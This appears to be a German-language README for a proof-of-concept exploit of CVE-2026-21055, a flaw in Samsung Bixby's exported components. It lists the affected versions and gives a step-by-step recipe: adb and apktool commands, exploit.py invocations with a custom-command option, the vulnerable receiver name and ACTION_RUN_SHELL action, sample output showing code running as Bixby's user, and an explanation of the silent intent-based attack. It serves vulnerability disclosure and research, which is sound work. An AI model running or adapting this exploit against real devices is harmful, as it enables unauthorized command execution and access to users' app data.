
Proof of Concept für CVE-2026-21055: Der unsachgemäße Export von Android-Anwendungskomponenten in Samsung Bixby vor Version 4.0.70.8 ermöglicht es lokalen Angreifern, beliebige Befehle mit Bixby-Berechtigung auszuführen.
Dieses Repository enthält zwei Python-Skripte:
analyze_components.py — Analysiert eine dekompilierte AndroidManifest.xml, um exportierte Activities, Services, Receiver und Provider aufzulisten. Markiert Komponenten, die ohne Berechtigungsschutz exportiert wurden.
exploit.py — Demonstriert den Intent-basierten Angriff, indem ein präparierter Broadcast-Intent über adb shell am an Bixbys exportierten Befehlsempfänger gesendet wird und so ein Befehl mit Bixbys Systemprivilegien ausgeführt wird.
| Feld | Wert |
|---|---|
| CVE-ID | CVE-2026-21055 |
| Samsung SVE | SVE-2026-0917 |
| CVSS v4.0 | 8.5 — Hoch |
| CWE | CWE-926 — Unsachgemäßer Export von Android-Anwendungskomponenten |
| Betroffene App | Samsung Bixby (com.samsung.android.bixby.agent) |
| Betroffene Versionen | < 4.0.70.8 |
| Behobene Version | 4.0.70.8 |
| Angriffsvektor | Lokal (bösartige App auf demselben Gerät) |
| Erforderliche Berechtigungen | Keine |
| Benutzerinteraktion | Keine |
| Auswirkung | Beliebige Befehlsausführung mit Bixby-Berechtigung |
Ziehe die Bixby-APK vom Gerät und dekompiliere sie:
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent
# Pull the APK
$ adb pull <apk_path> bixby.apk
# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f
Führe das Analyse-Skript aus:
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml
Oder lasse das Skript automatisch dekompilieren:
$ python3 analyze_components.py --apk bixby.apk
$ python3 exploit.py --list
# Default: execute 'id' command
$ python3 exploit.py
# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"
# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver
============================================================
CVE-2026-21055 PoC — Samsung Bixby Command Execution
Improper Export of Android Application Components
============================================================
[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version: 4.0.69.2
[*] Vulnerable: YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx
[*] Executing exploit...
[*] Crafting exploit Intent...
Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
Action: com.samsung.android.bixby.agent.ACTION_RUN_SHELL
Command: id
Output: /data/local/tmp/bixby_poc_output
[+] Intent sent.
[+] Command output (executed with Bixby privilege):
uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)
[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx
Komponentenexport: Bixby exportiert eine oder mehrere Komponenten (Services/Receiver), die Befehlsausführung oder Automatisierungsauslöser verarbeiten. Diese Komponenten werden mit android:exported="true", aber ohne android:permission-Attribut oder Laufzeit-Berechtigungsprüfungen exportiert.
Intent-Zustellung: Jede App auf dem Gerät kann einen Intent an diese exportierten Komponenten senden. Der Intent enthält einen Aktions-String (z. B. ACTION_RUN_SHELL) sowie String-Extras mit dem auszuführenden Befehl und einem Ausgabedateipfad.
Befehlsausführung: Bixbys exportierte Komponente empfängt den Intent, extrahiert den Befehl und führt ihn über Runtime.exec() oder einen ähnlichen Mechanismus aus. Der Befehl läuft im Prozesskontext von Bixby und erbt dabei sämtliche Systemrechte von Bixby.
Keine Benutzerinteraktion: Der Exploit erfordert keine Benutzerinteraktion. Die bösartige App sendet den Intent still im Hintergrund.
Dieses PoC wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Teste nur auf Geräten, die dir gehören oder für die du eine ausdrückliche Testgenehmigung besitzt. Verwende diesen Exploit nicht gegen Geräte ohne Zustimmung des Eigentümers.